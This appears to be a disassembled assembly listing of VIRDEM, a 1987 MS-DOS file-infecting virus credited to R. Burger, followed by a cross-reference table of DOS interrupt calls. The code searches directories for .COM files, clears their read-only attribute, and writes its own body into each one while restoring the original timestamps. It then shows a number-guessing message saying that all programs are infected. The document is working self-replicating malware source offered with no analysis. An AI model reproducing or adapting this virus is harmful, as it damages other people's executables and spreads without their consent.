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;<3B><> <20><>
;<3B><> VIRDEM <20><>
;<3B><> <20><>
;<3B><> Created: 16-Mar-87 <20><>
;<3B><> Version: <20><>
;<3B><> Passes: 5 Analysis Options on: QRS <20><>
;<3B><> Copyright by R.Burger 1986,1987 <20><>
;<3B><> <20><>
data_1e equ 80h ; (8C04:0080=0)
data_2e equ 9Eh ; (8C04:009E=0)
data_16e equ 0F800h ; (8C04:F800=0)
data_17e equ 0FD00h ; (8C04:FD00=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
virdem proc far
mov sp,0FE00h
push ax
push bx
push cx
push dx
push bp
push si
push di
push ds
push es
push ss
pushf ; Push flags
mov si,data_1e ; (8C04:0080=0)
lea di,cs:[3BFh] ; Load effective addr
mov cx,20h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,0
mov es:data_5,ax ; (8C04:038F=0)
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
cmp bl,39h ; '9'
je loc_1 ; Jump if equal
inc bl
loc_1: ; xref 8C04:012C
mov byte ptr es:data_12+0Dh,bl ; (8C04:0422=30h)
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov cs:data_10,al ; (8C04:03E1=0)
mov ah,47h ; 'G'
mov dh,0
add al,1
mov dl,al
lea si,cs:[3E3h] ; Load effective addr
int 21h ; DOS Services ah=function 47h
; get present dir,drive dl,1=a:
jmp short loc_3 ; (016D)
db 90h
loc_2: ; xref 8C04:0191, 01A0
mov ah,40h ; '@'
mov bx,1
mov cx,34h
lea dx,cs:[57Ch] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov dx,cs:data_6 ; (8C04:0391=600h)
mov cs:data_17e,dx ; (8C04:FD00=0)
jmp loc_12 ; (02E4)
jmp loc_12 ; (02E4)
loc_3: ; xref 8C04:014B
mov dl,0
mov ah,0Eh
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov ah,3Bh ; ';'
lea dx,cs:[3DFh] ; Load effective addr
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
jmp short loc_7 ; (01C9)
db 90h
loc_4: ; xref 8C04:01D4, 01E7
mov ah,3Bh ; ';'
lea dx,cs:[3DFh] ; Load effective addr
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
mov ah,4Eh ; 'N'
mov cx,11h
lea dx,cs:[399h] ; Load effective addr
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_2 ; Jump if carry Set
mov bx,cs:data_5 ; (8C04:038F=0)
inc bx
dec bx
jz loc_6 ; Jump if zero
loc_5: ; xref 8C04:01A3
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_2 ; Jump if carry Set
dec bx
jnz loc_5 ; Jump if not zero
loc_6: ; xref 8C04:019A
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
add bx,1Ch
mov word ptr es:[bx],5C20h
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3Bh ; ';'
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
pop ds
mov bx,cs:data_5 ; (8C04:038F=0)
inc bx
mov cs:data_5,bx ; (8C04:038F=0)
loc_7: ; xref 8C04:017B
mov ah,4Eh ; 'N'
mov cx,1
lea dx,cs:[393h] ; Load effective addr
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_4 ; Jump if carry Set
mov bx,es:data_5 ; (8C04:038F=0)
cmp bx,0
je loc_8 ; Jump if equal
jmp short loc_9 ; (01E9)
db 90h
loc_8: ; xref 8C04:01DE, 020D
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_4 ; Jump if carry Set
loc_9: ; xref 8C04:01E0
mov ah,3Dh ; '='
mov al,2
mov dx,data_2e ; (8C04:009E=0)
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,3Fh ; '?'
mov cx,500h
mov dx,data_16e ; (8C04:F800=0)
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
mov bx,cs:data_16e ; (8C04:F800=0)
cmp bx,9090h
je loc_8 ; Jump if equal
mov ah,43h ; 'C'
mov al,0
mov dx,data_2e ; (8C04:009E=0)
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,43h ; 'C'
mov al,1
and cx,0FEh
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,3Dh ; '='
mov al,2
mov dx,data_2e ; (8C04:009E=0)
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,57h ; 'W'
mov al,0
int 21h ; DOS Services ah=function 57h
; get/set file date & time
push cx
push dx
mov ah,42h ; 'B'
mov al,2
mov dx,0
mov cx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
test ax,8000h
jnz loc_10 ; Jump if not zero
cmp ax,500h
ja loc_10 ; Jump if above
call sub_3 ; (0380)
loc_10: ; xref 8C04:0244, 024A
push ax
push dx
mov ah,40h ; '@'
mov cx,500h
mov dx,data_16e ; (8C04:F800=0)
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
pop dx
pop ax
add ax,100h
mov es:data_4,ax ; (8C04:02BD=0)
add ax,500h
mov dx,cs:data_6 ; (8C04:0391=600h)
mov cs:data_17e,dx ; (8C04:FD00=0)
mov es:data_6,ax ; (8C04:0391=600h)
mov ah,40h ; '@'
mov cx,38h
lea dx,cs:[287h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jmp short loc_11 ; (02C0)
db 90h
db 0BFh, 80h, 00h, 8Dh, 36h,0BFh
db 03h,0B9h, 20h, 00h,0F3h,0A4h
db 0E8h, 00h, 00h
virdem endp
sub_1 proc near
pop ax
mov bx,27h
add ax,bx
mov si,ax
mov bx,es:[si]
mov si,bx
mov di,offset ds:[100h] ; (8C04:0100=90h)
mov cx,500h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
popf ; Pop flags
pop ss
pop es
pop ds
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
mov ax,offset start
push ax
sub_1 endp
data_4 dw 0 ; xref 8C04:0262
db 90h
loc_11: ; xref 8C04:0284
mov ah,42h ; 'B'
mov al,0
mov dx,0
mov cx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
mov cx,500h
lea dx,cs:[100h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,57h ; 'W'
mov al,1
pop dx
pop cx
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_12: ; xref 8C04:0167, 016A
call sub_2 ; (036E)
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
cmp bl,31h ; '1'
jne loc_13 ; Jump if not equal
mov ah,40h ; '@'
mov bx,1
mov cx,67h
lea dx,cs:[404h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_13: ; xref 8C04:02F0
mov ah,40h ; '@'
mov bx,1
mov cx,102h
lea dx,cs:[404h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,2
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
mov dl,bl
int 21h ; DOS Services ah=function 02h
; display char dl
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
mov ah,0Ch
mov al,1
int 21h ; DOS Services ah=function 0Ch
; clear keybd buffer & input al
or dl,30h ; '0'
and dl,bl
cmp dl,al
je loc_14 ; Jump if equal
mov bl,dl
mov ah,2
mov dl,20h ; ' '
int 21h ; DOS Services ah=function 02h
; display char dl
mov dl,3Eh ; '>'
int 21h ; DOS Services ah=function 02h
; display char dl
mov dl,bl
int 21h ; DOS Services ah=function 02h
; display char dl
mov dl,3Ch ; '<'
int 21h ; DOS Services ah=function 02h
; display char dl
mov ah,40h ; '@'
mov bx,1
mov cx,3Ch
lea dx,cs:[507h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_14: ; xref 8C04:0330
mov ah,40h ; '@'
mov bx,1
mov cx,37h
lea dx,cs:[544h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ax,es:data_17e ; (8C04:FD00=0)
push ax
; Called from: 8C04:02E5
sub_2 proc near
mov ah,0Eh
mov dl,cs:data_10 ; (8C04:03E1=0)
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov ah,3Bh ; ';'
lea dx,cs:[3E2h] ; Load effective addr
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
sub_2 endp
; Called from: 8C04:024C
sub_3 proc near
mov ah,42h ; 'B'
mov al,0
mov dx,500h
mov cx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
sub_3 endp
db 0
data_5 dw 0 ; xref 8C04:0120, 0193, 01BE, 01C4
; 01D6
data_6 dw 600h ; xref 8C04:015D, 026A, 0274
db "*.com", 00h
db 2Ah, 00h,0FFh, 00h, 00h, 00h
db 00h, 00h, 3Fh, 00h
db "????????exe"
db 00h, 00h, 00h
db 00h, 00h
db "????????com"
db 33 dup (0)
db 5Ch, 00h
data_10 db 0 ; xref 8C04:0139, 0370
db 5Ch
db 33 dup (0)
db 'Virdem Ver.: 1.06'
data_12 db ' (Generation 0) aktive.', 0Ah, 0Dh
copyright db 'Copyright by R.Burger 1986,1987'
db 0Ah, 0Dh, 'Phone.: D - 05932/5451'
db ' ', 0Ah, 0Dh, ' ', 0Ah, 0Dh, 'T'
db 'his is a demoprogram for ', 0Ah, 0Dh
db 'computerviruses. Please put in a'
db ' ', 0Ah, 0Dh, 'number now.', 0Ah
db 0Dh, 'If you', 27h, 're right, yo'
db 'u', 27h, 'll be', 0Ah, 0Dh, 'abl'
db 'e to continue.', 0Ah, 0Dh, 'The '
db 'number is between ', 0Ah, 0Dh, '0'
db ' and ', 0
db 0Ah, 0Dh, 'Sorry, you', 27h, 're '
db 'wrong', 0Ah, 0Dh, ' ', 0Ah
db 0Dh, 'More luck at next try ....', 0Ah
db 0Dh, 0
db 0Ah, 0Dh, 'Famous. You', 27h, 're'
db ' right.', 0Ah, 0Dh, 'You', 27h, 'l'
db 'l be able to continue. ', 0Ah, 0Dh
db 0
db 0Ah, 0Dh, 'All your programs are', 0Ah
db 0Dh, 'struck by VIRDEM.COM now.', 0Ah
db 0Dh
db 0
seg_a ends
end start
seg:off type label
---- ---- ---- ---------------
8C04:0100 far start
Interrupt 21h : terminate, cs=progm seg prefx
Interrupt 21h : display char dl
Interrupt 21h : clear keybd buffer & input al
Interrupt 21h : set default drive dl (0=a:)
Interrupt 21h : get default drive al (0=a:)
Interrupt 21h : get time, cx=hrs/min, dh=sec
Interrupt 21h : get DTA ptr into es:bx
Interrupt 21h : set current dir, path @ ds:dx
Interrupt 21h : open file, al=mode,name@ds:dx
Interrupt 21h : close file, bx=file handle
Interrupt 21h : read file, cx=bytes, to ds:dx
Interrupt 21h : write file cx=bytes, to ds:dx
Interrupt 21h : move file ptr, cx,dx=offset
Interrupt 21h : get/set file attrb, nam@ds:dx
Interrupt 21h : get present dir,drive dl,1=a:
Interrupt 21h : find 1st filenam match @ds:dx
Interrupt 21h : find next filename match
Interrupt 21h : get/set file date & time
No I/O ports used.